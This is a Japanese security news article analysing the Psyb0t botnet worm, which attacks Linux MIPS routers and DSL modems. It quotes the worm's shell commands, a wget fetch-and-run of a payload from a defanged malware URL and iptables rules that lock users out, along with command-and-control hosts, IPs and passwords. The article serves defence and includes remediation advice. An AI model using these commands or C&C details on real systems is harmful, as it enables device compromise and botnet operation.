SCAN DISPATCH :インフラ攻撃(1) 初のルータとDSLモデムを攻撃するボットネット・ワーム | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2017.10.24(火)

SCAN DISPATCH :インフラ攻撃(1) 初のルータとDSLモデムを攻撃するボットネット・ワーム

国際 海外情報

 SCAN DISPATCH は、アメリカのセキュリティ業界及ハッカーコミュニティから届いたニュースを、狭く絞り込み、深く掘り下げて掲載します。

──

 ダン・カミンスキーがDNSプロトコルの脆弱性を指摘してから一年ほど経つ。もともと学術用として開発されたインターネットで使用されているプロトコルの多くは、大幅なアップデートもされることなく現在でも使用されている。インターネットというインフラ自体の脆弱性をカミンスキー氏は指摘した訳だが、今回と次回の2回にわたって、インフラを対象とした新種の攻撃をレポートしたい。

 まずは、Psyb0t(サイボット)と呼ばれるルータ専用のワーム。ルータを攻撃対象としたボットネット・ワームはこれが初めてで、このワームは最初、主にオーストラリアで販売されているルータ Netcomm NB5に感染していることが発見され、1月にTerry Baume氏が論文を書いている。その後、攻撃に脆弱性を持つのは、「Linux mipselのルータで、ルータ管理インターフェイスがあるか、DMZにsshdかtelnetdができ、ユーザーネームとパスワードがデフォルトであるなど弱い組み合わせであるもの」ということが分かっている。mipselとは、MIPSがlittle-endian modeで動作しているもので、OpenWRT and DD-WRTなどのカスタムファームウェアを動作させているものも危ない。

 現在までに10万台のモデムが被害にあっていると、感染マシンの乱用を阻止することを目的にIPアドレスをリアルタイムで監視しているDroneBLでは推測している。

 さてその感染方法だが、まずワームはユーザーネームとパスワードを、ブルートフォース、パケット検査等の数種類の攻撃方法を使用して手に入れる。次にshellを使用する。そして

# rm -f /var/tmp/udhcpc.env
# wget

して、wget がある場合 hxxp://dweb.webhop.net/.bb/udhcpc.env をダウンロードしてこれを走らす。wget がない場合は、 "busybox ftpget" を探し出してtftpクライアントを使い、同様に上記プログラムをダウロードする。そして、

# iptables -A INPUT -p tcp ─dport 23 -j DROP
# iptables -A INPUT -p tcp ─dport 22 -j DROP
# iptables -A INPUT -p tcp ─dport 80 -j DROP

して、ユーザーをルータから排除する。

 これで分かるように、ルータが感染された症状としてポート23, 22, 80がブロックされてしまう。これらのポートがブロックされていたら、Psyb0tの感染と疑い、ルータをハードリセットし、パスワードを変更して最新のファームウェアにアップデートすることが必要だ。

 さて、一度ルータが感染されると、そのルータはIRCボットネットになってしまう。

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: [NIP]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

 このPsyb0tについて、1月に論文を書いたTerry Baume氏によれば、
strcpy.us.toのサーバーは

strcpy.us.to = 202.71.102.110 (Malaysia)
strcpy.us.to = 202.67.218.33 (Hong Kong)
strcpy.us.to = 216.199.217.170 (USA)
strcpy.us.to = 207.155.1.5 (USA)

らのラウンドロビンになっているそうだ。

 オーストラリアのパーソナルコンピュータマガジン Apcmag では、最新のバージョン18では、30種類のLynksys、10種類のNetgear、そしてその他15種類のケーブルやDSLモデムのシェルコードを内蔵しているとレポートしており、ブルートフォース用のユーザーネームが全部で6,000個、パスワードも13,000個も含まれていたそうだ。

 さて面白いことに、このボットネット感染劇には以下のように、3月22日に終わっている…

【執筆:米国 笠原利香】

【関連リンク】
Terry Baume氏論文
http://www.adam.com.au/bogaurd/PSYB0T.pdf
DroneBLブログ
http://www.dronebl.org/blog/
APC Magazine記事
http://apcmag.com/Content.aspx?id=3687
Dan Kaminskyブログ
http://www.doxpara.com/?p=1283
──
※ この記事は Scan購読会員向け記事をダイジェスト掲載しました
購読会員登録案内 http://www.ns-research.jp/cgi-bin/ct/p.cgi?w02_ssw
《ScanNetSecurity》

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

Scan BASIC 会員限定記事

もっと見る

Scan BASIC 会員限定記事特集をもっと見る

[Web小説] サイバー探偵 工藤伸治の事件簿サーガ (シーズン 1~6 第1話)

もっと見る

[Web小説] サイバー探偵 工藤伸治の事件簿サーガ (シーズン 1~6 第1話)特集をもっと見る

カテゴリ別新着記事

国際 カテゴリの人気記事 MONTHLY ランキング

  1. 搾取される底辺サイバー犯罪者、無料配付トロイにはバックドア(The Register)

    搾取される底辺サイバー犯罪者、無料配付トロイにはバックドア(The Register)

  2. WPA2の新たな脆弱性への攻撃KRACK、暗号化技術の根底にある欠陥(The Register)

    WPA2の新たな脆弱性への攻撃KRACK、暗号化技術の根底にある欠陥(The Register)

  3. セキュリティ人材の慢性不足、海外の取り組みは(The Register)

    セキュリティ人材の慢性不足、海外の取り組みは(The Register)

  4. SMSによる二要素認証が招くSOS(The Register)

  5. 「Tor 禁止令」を解く Facebook、暗号化の onion アクセスポイントを宣伝~これからは暗号化通信も完全に OK(The Register)

  6. フィッシング詐欺支援サービスの価格表(The Register)

  7. iCloudからの女優のプライベート画像流出事件、容疑者がフィッシングの罪を大筋で認める

  8. Mac OS X のシングルユーザモードの root アクセス(2)

  9. AWS 設定ミスでウォールストリートジャーナル購読者情報他 220 万件流出(The Register)

  10. 「過激派の」Tails や Tor を使っている? おめでとう、あなたは NSA のリストに載っている~Linux 情報サイトの読者や、プライバシーに関心を持つネット市民が標的にされているとの報告(The Register)

全カテゴリランキング

★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★
<b>★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★</b>

経営課題としてサイバーセキュリティに取り組む情報システム部門や、研究・開発・経営企画に携わる方へ向けた、創刊19年のセキュリティ情報サービス Scan PREMIUM を、貴社の事業リスク低減のためにご活用ください。

×